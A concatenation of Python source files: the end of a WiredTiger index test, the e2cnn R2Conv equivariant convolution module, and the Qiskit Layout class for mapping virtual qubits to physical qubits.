square = i * i
cube = square * i
self.assertEqual(ikey, i)
self.assertEqual(skey, 'key' + str(i))
self.assertEqual(s1, 'val' + str(square))
self.assertEqual(i2, square)
self.assertEqual(s3, 'val' + str(cube))
self.assertEqual(i4, cube)
count += 1
cursor.close()
self.assertEqual(count, n)
# we check an index that was created after populating
cursor = self.session.open_cursor('index:main:i2S1i4', None, None)
count = 0
for i2key, s1key, i4key, s1, i2, s3, i4 in cursor:
i = int(i4key ** (1 / 3.0) + 0.0001) # cuberoot
#self.tty('index:main:i2S1i4[' + str(i) + '] (' +
# str(i2key) + ',' +
# str(s1key) + ',' +
# str(i4key) + ') -> (' +
# str(s1) + ',' +
# str(i2) + ',' +
# str(s3) + ',' +
# str(i4) + ')')
self.assertEqual(i2key, i2)
self.assertEqual(s1key, s1)
self.assertEqual(i4key, i4)
ikey = i
skey = 'key' + str(i)
square = i * i
cube = square * i
self.assertEqual(ikey, i)
self.assertEqual(skey, 'key' + str(i))
self.assertEqual(s1, 'val' + str(square))
self.assertEqual(i2, square)
self.assertEqual(s3, 'val' + str(cube))
self.assertEqual(i4, cube)
count += 1
cursor.close()
self.assertEqual(count, n)
def test_colgroups(self):
self.session.create("table:main", "key_format=iS,value_format=SiSi,"
"columns=(ikey,Skey,S1,i2,S3,i4),colgroups=(c1,c2)")
self.session.create("colgroup:main:c1", "columns=(S1,i2)")
self.session.create("colgroup:main:c2", "columns=(S3,i4)")
self.populate()
self.check_entries()
if __name__ == '__main__':
wttest.run()
|
py | b404264432384bcba4b2de04ba11f434186e622d |
from torch.nn.functional import conv2d, pad
from e2cnn.nn import init
from e2cnn.nn import FieldType
from e2cnn.nn import GeometricTensor
from e2cnn.gspaces import *
from ..equivariant_module import EquivariantModule
from .basisexpansion import BasisExpansion
from .basisexpansion_blocks import BlocksBasisExpansion
from typing import Callable, Union, Tuple, List
import torch
from torch.nn import Parameter
import numpy as np
import math
__all__ = ["R2Conv"]
class R2Conv(EquivariantModule):
def __init__(self,
in_type: FieldType,
out_type: FieldType,
kernel_size: int,
padding: int = 0,
stride: int = 1,
dilation: int = 1,
padding_mode: str = 'zeros',
groups: int = 1,
bias: bool = True,
basisexpansion: str = 'blocks',
sigma: Union[List[float], float] = None,
frequencies_cutoff: Union[float, Callable[[float], int]] = None,
rings: List[float] = None,
maximum_offset: int = None,
recompute: bool = False,
basis_filter: Callable[[dict], bool] = None,
initialize: bool = True,
):
r"""
G-steerable planar convolution mapping between the input and output :class:`~e2cnn.nn.FieldType` s specified by
the parameters ``in_type`` and ``out_type``.
This operation is equivariant under the action of :math:`\R^2\rtimes G` where :math:`G` is the
:attr:`e2cnn.nn.FieldType.fibergroup` of ``in_type`` and ``out_type``.
Specifically, let :math:`\rho_\text{in}: G \to \GL{\R^{c_\text{in}}}` and
:math:`\rho_\text{out}: G \to \GL{\R^{c_\text{out}}}` be the representations specified by the input and output
field types.
Then :class:`~e2cnn.nn.R2Conv` guarantees an equivariant mapping
.. math::
\kappa \star [\mathcal{T}^\text{in}_{g,u} . f] = \mathcal{T}^\text{out}_{g,u} . [\kappa \star f] \qquad\qquad \forall g \in G, u \in \R^2
where the transformation of the input and output fields are given by
.. math::
[\mathcal{T}^\text{in}_{g,u} . f](x) &= \rho_\text{in}(g)f(g^{-1} (x - u)) \\
[\mathcal{T}^\text{out}_{g,u} . f](x) &= \rho_\text{out}(g)f(g^{-1} (x - u)) \\
The equivariance of G-steerable convolutions is guaranteed by restricting the space of convolution kernels to an
equivariant subspace.
As proven in `3D Steerable CNNs <https://arxiv.org/abs/1807.02547>`_, this parametrizes the *most general
equivariant convolutional map* between the input and output fields.
For feature fields on :math:`\R^2` (e.g. images), the complete G-steerable kernel spaces for :math:`G \leq \O2`
is derived in `General E(2)-Equivariant Steerable CNNs <https://arxiv.org/abs/1911.08251>`_.
During training, in each forward pass the module expands the basis of G-steerable kernels with learned weights
before calling :func:`torch.nn.functional.conv2d`.
When :meth:`~torch.nn.Module.eval()` is called, the filter is built with the current trained weights and stored
for future reuse such that no overhead of expanding the kernel remains.
.. warning ::
When :meth:`~torch.nn.Module.train()` is called, the attributes :attr:`~e2cnn.nn.R2Conv.filter` and
:attr:`~e2cnn.nn.R2Conv.expanded_bias` are discarded to avoid situations of mismatch with the
learnable expansion coefficients.
See also :meth:`e2cnn.nn.R2Conv.train`.
This behaviour can cause problems when storing the :meth:`~torch.nn.Module.state_dict` of a model while in
a mode and lately loading it in a model with a different mode, as the attributes of the class change.
To avoid this issue, we recommend converting the model to eval mode before storing or loading the state
dictionary.
The learnable expansion coefficients of the this module can be initialized with the methods in
:mod:`e2cnn.nn.init`.
By default, the weights are initialized in the constructors using :func:`~e2cnn.nn.init.generalized_he_init`.
.. warning ::
This initialization procedure can be extremely slow for wide layers.
In case initializing the model is not required (e.g. before loading the state dict of a pre-trained model)
or another initialization method is preferred (e.g. :func:`~e2cnn.nn.init.deltaorthonormal_init`), the
parameter ``initialize`` can be set to ``False`` to avoid unnecessary overhead.
The parameters ``basisexpansion``, ``sigma``, ``frequencies_cutoff``, ``rings`` and ``maximum_offset`` are
optional parameters used to control how the basis for the filters is built, how it is sampled on the filter
grid and how it is expanded to build the filter. We suggest to keep these default values.
Args:
in_type (FieldType): the type of the input field, specifying its transformation law
out_type (FieldType): the type of the output field, specifying its transformation law
kernel_size (int): the size of the (square) filter
padding (int, optional): implicit zero paddings on both sides of the input. Default: ``0``
padding_mode(str, optional): ``zeros``, ``reflect``, ``replicate`` or ``circular``. Default: ``zeros``
stride (int, optional): the stride of the kernel. Default: ``1``
dilation (int, optional): the spacing between kernel elements. Default: ``1``
groups (int, optional): number of blocked connections from input channels to output channels.
It allows depthwise convolution. When used, the input and output types need to be
divisible in ``groups`` groups, all equal to each other.
Default: ``1``.
bias (bool, optional): Whether to add a bias to the output (only to fields which contain a
trivial irrep) or not. Default ``True``
basisexpansion (str, optional): the basis expansion algorithm to use
sigma (list or float, optional): width of each ring where the bases are sampled. If only one scalar
is passed, it is used for all rings.
frequencies_cutoff (callable or float, optional): function mapping the radii of the basis elements to the
maximum frequency accepted. If a float values is passed, the maximum frequency is equal to the
radius times this factor. By default (``None``), a more complex policy is used.
rings (list, optional): radii of the rings where to sample the bases
maximum_offset (int, optional): number of additional (aliased) frequencies in the intertwiners for finite
groups. By default (``None``), all additional frequencies allowed by the frequencies cut-off
are used.
recompute (bool, optional): if ``True``, recomputes a new basis for the equivariant kernels.
By Default (``False``), it caches the basis built or reuse a cached one, if it is found.
basis_filter (callable, optional): function which takes as input a descriptor of a basis element
(as a dictionary) and returns a boolean value: whether to preserve (``True``) or discard (``False``)
the basis element. By default (``None``), no filtering is applied.
initialize (bool, optional): initialize the weights of the model. Default: ``True``
Attributes:
~.weights (torch.Tensor): the learnable parameters which are used to expand the kernel
~.filter (torch.Tensor): the convolutional kernel obtained by expanding the parameters
in :attr:`~e2cnn.nn.R2Conv.weights`
~.bias (torch.Tensor): the learnable parameters which are used to expand the bias, if ``bias=True``
~.expanded_bias (torch.Tensor): the equivariant bias which is summed to the output, obtained by expanding
the parameters in :attr:`~e2cnn.nn.R2Conv.bias`
"""
assert in_type.gspace == out_type.gspace
assert isinstance(in_type.gspace, GeneralOnR2)
super(R2Conv, self).__init__()
self.space = in_type.gspace
self.in_type = in_type
self.out_type = out_type
self.kernel_size = kernel_size
self.stride = stride
self.dilation = dilation
self.padding = padding
self.padding_mode = padding_mode
self.groups = groups
if isinstance(padding, tuple) and len(padding) == 2:
_padding = padding
elif isinstance(padding, int):
_padding = (padding, padding)
else:
raise ValueError('padding needs to be either an integer or a tuple containing two integers but {} found'.format(padding))
padding_modes = {'zeros', 'reflect', 'replicate', 'circular'}
if padding_mode not in padding_modes:
raise ValueError("padding_mode must be one of [{}], but got padding_mode='{}'".format(padding_modes, padding_mode))
self._reversed_padding_repeated_twice = tuple(x for x in reversed(_padding) for _ in range(2))
if groups > 1:
# Check the input and output classes can be split in `groups` groups, all equal to each other
# first, check that the number of fields is divisible by `groups`
assert len(in_type) % groups == 0
assert len(out_type) % groups == 0
in_size = len(in_type) // groups
out_size = len(out_type) // groups
# then, check that all groups are equal to each other, i.e. have the same types in the same order
assert all(in_type.representations[i] == in_type.representations[i % in_size] for i in range(len(in_type)))
assert all(out_type.representations[i] == out_type.representations[i % out_size] for i in range(len(out_type)))
# finally, retrieve the type associated to a single group in input.
# this type will be used to build a smaller kernel basis and a smaller filter
# as in PyTorch, to build a filter for grouped convolution, we build a filter which maps from one input
# group to all output groups. Then, PyTorch's standard convolution routine interpret this filter as `groups`
# different filters, each mapping an input group to an output group.
in_type = in_type.index_select(list(range(in_size)))
if bias:
# bias can be applied only to trivial irreps inside the representation
# to apply bias to a field we learn a bias for each trivial irreps it contains
# and, then, we transform it with the change of basis matrix to be able to apply it to the whole field
# this is equivalent to transform the field to its irreps through the inverse change of basis,
# sum the bias only to the trivial irrep and then map it back with the change of basis
# count the number of trivial irreps
trivials = 0
for r in self.out_type:
for irr in r.irreps:
if self.out_type.fibergroup.irreps[irr].is_trivial():
trivials += 1
# if there is at least 1 trivial irrep
if trivials > 0:
# matrix containing the columns of the change of basis which map from the trivial irreps to the
# field representations. This matrix allows us to map the bias defined only over the trivial irreps
# to a bias for the whole field more efficiently
bias_expansion = torch.zeros(self.out_type.size, trivials)
p, c = 0, 0
for r in self.out_type:
pi = 0
for irr in r.irreps:
irr = self.out_type.fibergroup.irreps[irr]
if irr.is_trivial():
bias_expansion[p:p+r.size, c] = torch.tensor(r.change_of_basis[:, pi])
c += 1
pi += irr.size
p += r.size
self.register_buffer("bias_expansion", bias_expansion)
self.bias = Parameter(torch.zeros(trivials), requires_grad=True)
self.register_buffer("expanded_bias", torch.zeros(out_type.size))
else:
self.bias = None
self.expanded_bias = None
else:
self.bias = None
self.expanded_bias = None
grid, basis_filter, rings, sigma, maximum_frequency = compute_basis_params(kernel_size,
frequencies_cutoff,
rings,
sigma,
dilation,
basis_filter)
# BasisExpansion: submodule which takes care of building the filter
self._basisexpansion = None
# notice that `in_type` is used instead of `self.in_type` such that it works also when `groups > 1`
if basisexpansion == 'blocks':
self._basisexpansion = BlocksBasisExpansion(in_type, out_type,
grid,
sigma=sigma,
rings=rings,
maximum_offset=maximum_offset,
maximum_frequency=maximum_frequency,
basis_filter=basis_filter,
recompute=recompute)
else:
raise ValueError('Basis Expansion algorithm "%s" not recognized' % basisexpansion)
self.weights = Parameter(torch.zeros(self.basisexpansion.dimension()), requires_grad=True)
self.register_buffer("filter", torch.zeros(out_type.size, in_type.size, kernel_size, kernel_size))
if initialize:
# by default, the weights are initialized with a generalized form of He's weight initialization
init.generalized_he_init(self.weights.data, self.basisexpansion)
@property
def basisexpansion(self) -> BasisExpansion:
r"""
Submodule which takes care of building the filter.
It uses the learnt ``weights`` to expand a basis and returns a filter in the usual form used by conventional
convolutional modules.
It uses the learned ``weights`` to expand the kernel in the G-steerable basis and returns it in the shape
:math:`(c_\text{out}, c_\text{in}, s^2)`, where :math:`s` is the ``kernel_size``.
"""
return self._basisexpansion
def expand_parameters(self) -> Tuple[torch.Tensor, torch.Tensor]:
r"""
Expand the filter in terms of the :attr:`e2cnn.nn.R2Conv.weights` and the
expanded bias in terms of :class:`e2cnn.nn.R2Conv.bias`.
Returns:
the expanded filter and bias
"""
filter = self.basisexpansion(self.weights)
filter = filter.reshape(filter.shape[0], filter.shape[1], self.kernel_size, self.kernel_size)
if self.bias is None:
bias = None
else:
bias = self.bias_expansion @ self.bias
return filter, bias
def forward(self, input: GeometricTensor):
r"""
Convolve the input with the expanded filter and bias.
Args:
input (GeometricTensor): input feature field transforming according to ``in_type``
Returns:
output feature field transforming according to ``out_type``
"""
assert input.type == self.in_type
if not self.training:
filter = self.filter
bias = self.expanded_bias
else:
# retrieve the filter and the bias
filter, bias = self.expand_parameters()
# use it for convolution and return the result
if self.padding_mode != 'zeros':
output = conv2d(input.tensor, filter,
stride=self.stride,
padding=self.padding,
dilation=self.dilation,
groups=self.groups,
bias=bias)
else:
output = conv2d(pad(input.tensor, self._reversed_padding_repeated_twice, self.padding_mode),
filter,
stride=self.stride,
padding=self.padding,
dilation=self.dilation,
groups=self.groups,
bias=bias)
return GeometricTensor(output, self.out_type)
def train(self, mode=True):
r"""
If ``mode=True``, the method sets the module in training mode and discards the :attr:`~e2cnn.nn.R2Conv.filter`
and :attr:`~e2cnn.nn.R2Conv.expanded_bias` attributes.
If ``mode=False``, it sets the module in evaluation mode. Moreover, the method builds the filter and the bias using
the current values of the trainable parameters and store them in :attr:`~e2cnn.nn.R2Conv.filter` and
:attr:`~e2cnn.nn.R2Conv.expanded_bias` such that they are not recomputed at each forward pass.
.. warning ::
This behaviour can cause problems when storing the :meth:`~torch.nn.Module.state_dict` of a model while in
a mode and lately loading it in a model with a different mode, as the attributes of this class change.
To avoid this issue, we recommend converting the model to eval mode before storing or loading the state
dictionary.
Args:
mode (bool, optional): whether to set training mode (``True``) or evaluation mode (``False``).
Default: ``True``.
"""
if mode:
# TODO thoroughly check this is not causing problems
if hasattr(self, "filter"):
del self.filter
if hasattr(self, "expanded_bias"):
del self.expanded_bias
elif self.training:
# avoid re-computation of the filter and the bias on multiple consecutive calls of `.eval()`
filter, bias = self.expand_parameters()
self.register_buffer("filter", filter)
if bias is not None:
self.register_buffer("expanded_bias", bias)
else:
self.expanded_bias = None
return super(R2Conv, self).train(mode)
def evaluate_output_shape(self, input_shape: Tuple[int, int, int, int]) -> Tuple[int, int, int, int]:
assert len(input_shape) == 4
assert input_shape[1] == self.in_type.size
b, c, hi, wi = input_shape
ho = math.floor((hi + 2 * self.padding - self.dilation * (self.kernel_size - 1) - 1) / self.stride + 1)
wo = math.floor((wi + 2 * self.padding - self.dilation * (self.kernel_size - 1) - 1) / self.stride + 1)
return b, self.out_type.size, ho, wo
def check_equivariance(self, atol: float = 0.1, rtol: float = 0.1, assertion: bool = True, verbose: bool = True):
# np.set_printoptions(precision=5, threshold=30 *self.in_type.size**2, suppress=False, linewidth=30 *self.in_type.size**2)
feature_map_size = 33
last_downsampling = 5
first_downsampling = 5
initial_size = (feature_map_size * last_downsampling - 1 + self.kernel_size) * first_downsampling
c = self.in_type.size
import matplotlib.image as mpimg
from skimage.measure import block_reduce
from skimage.transform import resize
x = mpimg.imread('../group/testimage.jpeg').transpose((2, 0, 1))[np.newaxis, 0:c, :, :]
x = resize(
x,
(x.shape[0], x.shape[1], initial_size, initial_size),
anti_aliasing=True
)
x = x / 255.0 - 0.5
if x.shape[1] < c:
to_stack = [x for i in range(c // x.shape[1])]
if c % x.shape[1] > 0:
to_stack += [x[:, :(c % x.shape[1]), ...]]
x = np.concatenate(to_stack, axis=1)
x = GeometricTensor(torch.FloatTensor(x), self.in_type)
def shrink(t: GeometricTensor, s) -> GeometricTensor:
return GeometricTensor(torch.FloatTensor(block_reduce(t.tensor.detach().numpy(), s, func=np.mean)), t.type)
errors = []
for el in self.space.testing_elements:
out1 = self(shrink(x, (1, 1, 5, 5))).transform(el).tensor.detach().numpy()
out2 = self(shrink(x.transform(el), (1, 1, 5, 5))).tensor.detach().numpy()
out1 = block_reduce(out1, (1, 1, 5, 5), func=np.mean)
out2 = block_reduce(out2, (1, 1, 5, 5), func=np.mean)
b, c, h, w = out2.shape
center_mask = np.zeros((2, h, w))
center_mask[1, :, :] = np.arange(0, w) - w / 2
center_mask[0, :, :] = np.arange(0, h) - h / 2
center_mask[0, :, :] = center_mask[0, :, :].T
center_mask = center_mask[0, :, :] ** 2 + center_mask[1, :, :] ** 2 < (h / 4) ** 2
out1 = out1[..., center_mask]
out2 = out2[..., center_mask]
out1 = out1.reshape(-1)
out2 = out2.reshape(-1)
errs = np.abs(out1 - out2)
esum = np.maximum(np.abs(out1), np.abs(out2))
esum[esum == 0.0] = 1
relerr = errs / esum
if verbose:
print(el, relerr.max(), relerr.mean(), relerr.var(), errs.max(), errs.mean(), errs.var())
tol = rtol * esum + atol
if np.any(errs > tol) and verbose:
print(out1[errs > tol])
print(out2[errs > tol])
print(tol[errs > tol])
if assertion:
assert np.all(errs < tol), 'The error found during equivariance check with element "{}" is too high: max = {}, mean = {} var ={}'.format(el, errs.max(), errs.mean(), errs.var())
errors.append((el, errs.mean()))
return errors
# init.deltaorthonormal_init(self.weights.data, self.basisexpansion)
# filter = self.basisexpansion()
# center = self.s // 2
# filter = filter[..., center, center]
# assert torch.allclose(torch.eye(filter.shape[1]), filter.t() @ filter, atol=3e-7)
def export(self):
r"""
Export this module to a normal PyTorch :class:`torch.nn.Conv2d` module and set to "eval" mode.
"""
# set to eval mode so the filter and the bias are updated with the current
# values of the weights
self.eval()
filter = self.filter
bias = self.expanded_bias
# build the PyTorch Conv2d module
has_bias = self.bias is not None
conv = torch.nn.Conv2d(self.in_type.size,
self.out_type.size,
self.kernel_size,
padding=self.padding,
stride=self.stride,
dilation=self.dilation,
groups=self.groups,
bias=has_bias)
# set the filter and the bias
conv.weight.data = filter.data
if has_bias:
conv.bias.data = bias.data
return conv
def __repr__(self):
extra_lines = []
extra_repr = self.extra_repr()
if extra_repr:
extra_lines = extra_repr.split('\n')
main_str = self._get_name() + '('
if len(extra_lines) == 1:
main_str += extra_lines[0]
else:
main_str += '\n ' + '\n '.join(extra_lines) + '\n'
main_str += ')'
return main_str
def extra_repr(self):
s = ('{in_type}, {out_type}, kernel_size={kernel_size}, stride={stride}')
if self.padding != 0 and self.padding != (0, 0):
s += ', padding={padding}'
if self.dilation != 1 and self.dilation != (1, 1):
s += ', dilation={dilation}'
if self.groups != 1:
s += ', groups={groups}'
if self.bias is None:
s += ', bias=False'
return s.format(**self.__dict__)
def bandlimiting_filter(frequency_cutoff: Union[float, Callable[[float], float]]) -> Callable[[dict], bool]:
r"""
Returns a method which takes as input the attributes (as a dictionary) of a basis element and returns a boolean
value: whether to preserve that element (True) or not (False)
If the parameter ``frequency_cutoff`` is a scalar value, the maximum frequency allowed at a certain radius is
proportional to the radius itself. In thi case, the parameter ``frequency_cutoff`` is the factor controlling this
proportionality relation.
If the parameter ``frequency_cutoff`` is a callable, it needs to take as input a radius (a scalar value) and return
the maximum frequency which can be sampled at that radius.
Args:
frequency_cutoff (float): factor controlling the bandlimiting
Returns:
a function which checks the attributes of individual basis elements and chooses whether to discard them or not
"""
if isinstance(frequency_cutoff, float):
frequency_cutoff = lambda r, fco=frequency_cutoff: r * frequency_cutoff
def filter(attributes: dict) -> bool:
return math.fabs(attributes["frequency"]) <= frequency_cutoff(attributes["radius"])
return filter
def get_grid_coords(kernel_size: int, dilation: int = 1):
actual_size = dilation * (kernel_size -1) + 1
origin = actual_size / 2 - 0.5
points = []
for y in range(kernel_size):
y *= dilation
for x in range(kernel_size):
x *= dilation
p = (x - origin, -y + origin)
points.append(p)
points = np.array(points)
assert points.shape == (kernel_size ** 2, 2), points.shape
return points.T
def compute_basis_params(kernel_size: int,
frequencies_cutoff: Union[float, Callable[[float], float]] = None,
rings: List[float] = None,
sigma: List[float] = None,
dilation: int = 1,
custom_basis_filter: Callable[[dict], bool] = None,
):
# compute the coordinates of the centers of the cells in the grid where the filter is sampled
grid = get_grid_coords(kernel_size, dilation)
max_radius = np.sqrt((grid **2).sum(1)).max()
# max_radius = kernel_size // 2
# by default, the number of rings equals half of the filter size
if rings is None:
n_rings = math.ceil(kernel_size / 2)
# if self.group.order() > 0:
# # compute the number of edges of the polygon inscribed in the filter (which is a square)
# # whose points stay inside the filter under the action of the group
# # the number of edges is lcm(group's order, 4)
# n_edges = self.group.order()
# while n_edges % 4 > 0:
# n_edges *= 2
# # the largest ring we can sample has radius equal to the circumradius of the polygon described above
# n_rings /= math.cos(math.pi/n_edges)
# n_rings = s // 2 + 1
# rings = torch.linspace(1 - s % 2, s // 2, n_rings)
rings = torch.linspace(0, (kernel_size - 1) // 2, n_rings) * dilation
rings = rings.tolist()
assert all([max_radius >= r >= 0 for r in rings])
if sigma is None:
sigma = [0.6] * (len(rings) - 1) + [0.4]
for i, r in enumerate(rings):
if r == 0.:
sigma[i] = 0.005
elif isinstance(sigma, float):
sigma = [sigma] * len(rings)
# TODO - use a string name for this setting
if frequencies_cutoff is None:
frequencies_cutoff = -1.
if isinstance(frequencies_cutoff, float):
if frequencies_cutoff == -3:
frequencies_cutoff = _manual_fco3(kernel_size // 2)
elif frequencies_cutoff == -2:
frequencies_cutoff = _manual_fco2(kernel_size // 2)
elif frequencies_cutoff == -1:
frequencies_cutoff = _manual_fco1(kernel_size // 2)
else:
frequencies_cutoff = lambda r, fco=frequencies_cutoff: fco * r
# check if the object is a callable function
assert callable(frequencies_cutoff)
maximum_frequency = int(max(frequencies_cutoff(r) for r in rings))
fco_filter = bandlimiting_filter(frequencies_cutoff)
if custom_basis_filter is not None:
basis_filter = lambda d, custom_basis_filter=custom_basis_filter, fco_filter=fco_filter: (custom_basis_filter(d) and fco_filter(d))
else:
basis_filter = fco_filter
return grid, basis_filter, rings, sigma, maximum_frequency
def _manual_fco3(max_radius: float) -> Callable[[float], float]:
r"""
Returns a method which takes as input the radius of a ring and returns the maximum frequency which can be sampled
on that ring.
Args:
max_radius (float): radius of the last ring touching the border of the grid
Returns:
a function which checks the attributes of individual basis elements and chooses whether to discard them or not
"""
def filter(r: float) -> float:
max_freq = 0 if r == 0. else 1 if r == max_radius else 2
return max_freq
return filter
def _manual_fco2(max_radius: float) -> Callable[[float], float]:
r"""
Returns a method which takes as input the radius of a ring and returns the maximum frequency which can be sampled
on that ring.
Args:
max_radius (float): radius of the last ring touching the border of the grid
Returns:
a function which checks the attributes of individual basis elements and chooses whether to discard them or not
"""
def filter(r: float) -> float:
max_freq = 0 if r == 0. else min(2 * r, 1 if r == max_radius else 2 * r - (r + 1) % 2)
return max_freq
return filter
def _manual_fco1(max_radius: float) -> Callable[[float], float]:
r"""
Returns a method which takes as input the radius of a ring and returns the maximum frequency which can be sampled
on that ring.
Args:
max_radius (float): radius of the last ring touching the border of the grid
Returns:
a function which checks the attributes of individual basis elements and chooses whether to discard them or not
"""
def filter(r: float) -> float:
max_freq = 0 if r == 0. else min(2 * r, 2 if r == max_radius else 2 * r - (r + 1) % 2)
return max_freq
return filter
|
py | b404273eddad603b38e35e9198bcb04d025f1338 | # This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2018.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""
A two-ways dict to represent a layout.
Layout is the relation between virtual (qu)bits and physical (qu)bits.
Virtual (qu)bits are tuples, e.g. `(QuantumRegister(3, 'qr'), 2)` or simply `qr[2]`.
Physical (qu)bits are integers.
"""
from qiskit.circuit.quantumregister import Qubit
from qiskit.transpiler.exceptions import LayoutError
from qiskit.converters import isinstanceint
class Layout():
"""Two-ways dict to represent a Layout."""
def __init__(self, input_dict=None):
"""construct a Layout from a bijective dictionary, mapping
virtual qubits to physical qubits"""
self._p2v = {}
self._v2p = {}
if input_dict is not None:
if not isinstance(input_dict, dict):
raise LayoutError("Layout constructor takes a dict")
self.from_dict(input_dict)
def __repr__(self):
"""Representation of a Layout"""
str_list = []
for key, val in self._p2v.items():
str_list.append("{k}: {v},".format(k=key, v=val))
if str_list:
str_list[-1] = str_list[-1][:-1]
return "Layout({\n" + "\n".join(str_list) + "\n})"
def from_dict(self, input_dict):
"""Populates a Layout from a dictionary.
The dictionary must be a bijective mapping between
virtual qubits (tuple) and physical qubits (int).
Args:
input_dict (dict):
e.g.::
{(QuantumRegister(3, 'qr'), 0): 0,
(QuantumRegister(3, 'qr'), 1): 1,
(QuantumRegister(3, 'qr'), 2): 2}
Can be written more concisely as follows:
* virtual to physical::
{qr[0]: 0,
qr[1]: 1,
qr[2]: 2}
* physical to virtual::
{0: qr[0],
1: qr[1],
2: qr[2]}
"""
for key, value in input_dict.items():
virtual, physical = Layout.order_based_on_type(key, value)
self._p2v[physical] = virtual
if virtual is None:
continue
self._v2p[virtual] = physical
@staticmethod
def order_based_on_type(value1, value2):
"""decides which one is physical/virtual based on the type. Returns (virtual, physical)"""
if isinstanceint(value1) and isinstance(value2, (Qubit, type(None))):
physical = int(value1)
virtual = value2
elif isinstanceint(value2) and isinstance(value1, (Qubit, type(None))):
physical = int(value2)
virtual = value1
else:
raise LayoutError('The map (%s -> %s) has to be a (Bit -> integer)'
' or the other way around.' % (type(value1), type(value2)))
return virtual, physical
def __getitem__(self, item):
if item in self._p2v:
return self._p2v[item]
if item in self._v2p:
return self._v2p[item]
raise KeyError('The item %s does not exist in the Layout' % (item,))
def __setitem__(self, key, value):
virtual, physical = Layout.order_based_on_type(key, value)
self._set_type_checked_item(virtual, physical)
def _set_type_checked_item(self, virtual, physical):
old = self._v2p.pop(virtual, None)
self._p2v.pop(old, None)
old = self._p2v.pop(physical, None)
self._v2p.pop(old, None)
self._p2v[physical] = virtual
if virtual is not None:
self._v2p[virtual] = physical
def __delitem__(self, key):
if isinstance(key, int):
del self._p2v[key]
del self._v2p[self._p2v[key]]
elif isinstance(key, Qubit):
del self._v2p[key]
del self._p2v[self._v2p[key]]
else:
raise LayoutError('The key to remove should be of the form'
' Qubit or integer) and %s was provided' % (type(key),))
def __len__(self):
return len(self._p2v)
def copy(self):
"""Returns a copy of a Layout instance."""
layout_copy = type(self)()
layout_copy._p2v = self._p2v.copy()
layout_copy._v2p = self._v2p.copy()
return layout_copy
def add(self, virtual_bit, physical_bit=None):
"""
Adds a map element between `bit` and `physical_bit`. If `physical_bit` is not
defined, `bit` will be mapped to a new physical bit (extending the length of the
layout by one.)
Args:
virtual_bit (tuple): A (qu)bit. For example, (QuantumRegister(3, 'qr'), 2).
physical_bit (int): A physical bit. For example, 3.
"""
if physical_bit is None:
physical_candidate = len(self)
while physical_candidate in self._p2v:
physical_candidate += 1
physical_bit = physical_candidate
self[virtual_bit] = physical_bit
def add_register(self, reg):
"""Adds at the end physical_qubits that map each bit in reg.
Args:
reg (Register): A (qu)bit Register. For example, QuantumRegister(3, 'qr').
"""
for bit in reg:
self.add(bit)
def get_registers(self):
"""
Returns the registers in the layout [QuantumRegister(2, 'qr0'), QuantumRegister(3, 'qr1')]
Returns:
List: A list of Register in the layout
"""
return {bit.register for bit in self.get_virtual_bits()}
def get_virtual_bits(self):
"""
Returns the dictionary where the keys are virtual (qu)bits and the
values are physical (qu)bits.
"""
return self._v2p
def get_physical_bits(self):
"""
Returns the dictionary where the keys are physical (qu)bits and the
values are virtual (qu)bits.
"""
return self._p2v
def swap(self, left, right):
"""Swaps the map between left and right.
Args:
left (tuple or int): Item to swap with right.
right (tuple or int): Item to swap with left.
Raises:
LayoutError: If left and right have not the same type.
"""
if type(left) is not type(right):
raise LayoutError('The method swap only works with elements of the same type.')
temp = self[left]
self[left] = self[right]
self[right] = temp
def combine_into_edge_map(self, another_layout):
"""Combines self and another_layout into an "edge map".
For example::
self another_layout resulting edge map
qr_1 -> 0 0 <- q_2 qr_1 -> q_2
qr_2 -> 2 2 <- q_1 qr_2 -> q_1
qr_3 -> 3 3 <- q_0 qr_3 -> q_0
The edge map is used to compose dags via, for example, compose.
Args:
another_layout (Layout): The other layout to combine.
Returns:
dict: A "edge map".
Raises:
LayoutError: another_layout can be bigger than self, but not smaller.
Otherwise, raises.
"""
edge_map = dict()
for virtual, physical in self.get_virtual_bits().items():
if physical not in another_layout._p2v:
raise LayoutError('The wire_map_from_layouts() method does not support when the'
' other layout (another_layout) is smaller.')
edge_map[virtual] = another_layout[physical]
return edge_map
def reorder_bits(self, bits):
"""Given an ordered list of bits, reorder them according to this layout.
The list of bits must exactly match the virtual bits in this layout.
Args:
bits (list[Bit]): the bits to reorder.
Returns:
List: ordered bits.
"""
order = [0] * len(bits)
# the i-th bit is now sitting in position j
for i, v in enumerate(bits):
j = self[v]
order[i] = j
return order
@staticmethod
def generate_trivial_layout(*regs):
"""Creates a trivial ("one-to-one") Layout with the registers in `regs`.
Args:
*regs (Registers): registers to include in the layout.
Returns:
Layout: A layout with all the `regs` in the given order.
"""
layout = Layout()
for reg in regs:
layout.add_register(reg)
return layout
@staticmethod
def from_intlist(int_list, *qregs):
"""Converts a list of integers to a Layout
mapping virtual qubits (index of the list) to
physical qubits (the list values).
Args:
int_list (list): A list of integers.
*qregs (QuantumRegisters): The quantum registers to apply
the layout to.
Returns:
Layout: The corresponding Layout object.
Raises:
LayoutError: Invalid input layout.
"""
if not all(isinstanceint(i) for i in int_list):
raise LayoutError('Expected a list of ints')
if len(int_list) != len(set(int_list)):
raise LayoutError('Duplicate values not permitted; Layout is bijective.')
num_qubits = sum(reg.size for reg in qregs)
# Check if list is too short to cover all qubits
if len(int_list) < num_qubits:
err_msg = 'Integer list length must equal number of qubits in circuit.'
raise LayoutError(err_msg)
out = Layout()
main_idx = 0
for qreg in qregs:
for idx in range(qreg.size):
out[qreg[idx]] = int_list[main_idx]
main_idx += 1
if main_idx != len(int_list):
for int_item in int_list[main_idx:]:
out[int_item] = None
return out
@staticmethod
def from_qubit_list(qubit_list):
"""
Populates a Layout from a list containing virtual
qubits, Qubit or None.
Args:
qubit_list (list):
e.g.: [qr[0], None, qr[2], qr[3]]
Returns:
Layout: the corresponding Layout object
Raises:
LayoutError: If the elements are not Qubit or None
"""
out = Layout()
for physical, virtual in enumerate(qubit_list):
if virtual is None:
continue
if isinstance(virtual, Qubit):
if virtual in out._v2p:
raise LayoutError('Duplicate values not permitted; Layout is bijective.')
out[virtual] = physical
else:
raise LayoutError("The list should contain elements of the Bits or NoneTypes")
return out
|
py | b40427715c2ae389bee2ba9801bc471298a62a53 | # Definition for a binary tree node.
